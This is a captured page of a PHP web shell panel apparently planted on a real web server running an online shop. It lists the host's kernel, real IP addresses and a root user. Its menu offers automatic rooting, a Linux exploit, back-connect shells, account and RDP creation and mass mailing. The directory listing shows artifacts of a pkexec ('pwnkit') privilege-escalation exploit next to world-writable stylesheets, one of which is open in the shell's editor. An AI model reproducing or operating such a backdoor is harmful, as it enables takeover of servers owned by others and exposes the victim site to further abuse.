Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
modules /
welcome /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_advancement.scss
2.09
KB
-rwxrwxrwx
_navbar.scss
1.85
KB
-rwxrwxrwx
_popup.scss
3.44
KB
-rwxrwxrwx
_settings.scss
523
B
-rwxrwxrwx
_tooltip.scss
3.34
KB
-rwxrwxrwx
module.scss
1.4
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : module.scss
@import "~bourbon/app/assets/stylesheets/bourbon"; @import "settings"; @import 'advancement'; @import 'navbar'; @import 'tooltip'; @import 'popup'; #onboarding-welcome { .final-link { display: block; border: 1px solid #BBCDD2; border-radius: rem(3px); padding: rem(20px); margin: rem(7px) 0; text-decoration: none; > i { color: #BBCDD2; font-size: rem(64px); margin-bottom: rem(24px); } } } .btn { &.with-spinner { position: relative; } &.with-spinner.animated { border-color: white; background: white; outline-color: white; &:hover { border-color: white; background: white; } &:after { position: absolute; width: rem(30px); height: rem(30px); left: 50%; top: 50%; margin: { top: rem(-15px); left: rem(-15px); } display: block; border: 3px solid $primary-color; border-top-color: transparent; border-radius: rem(50px); background: transparent; content: ''; -webkit-animation:spin 4s linear infinite; -moz-animation:spin 4s linear infinite; animation:spin 4s linear infinite; } } } @-moz-keyframes spin { 100% { -moz-transform: rotate(360deg); } } @-webkit-keyframes spin { 100% { -webkit-transform: rotate(360deg); } } @keyframes spin { 100% { -webkit-transform: rotate(360deg); transform:rotate(360deg); } }
Close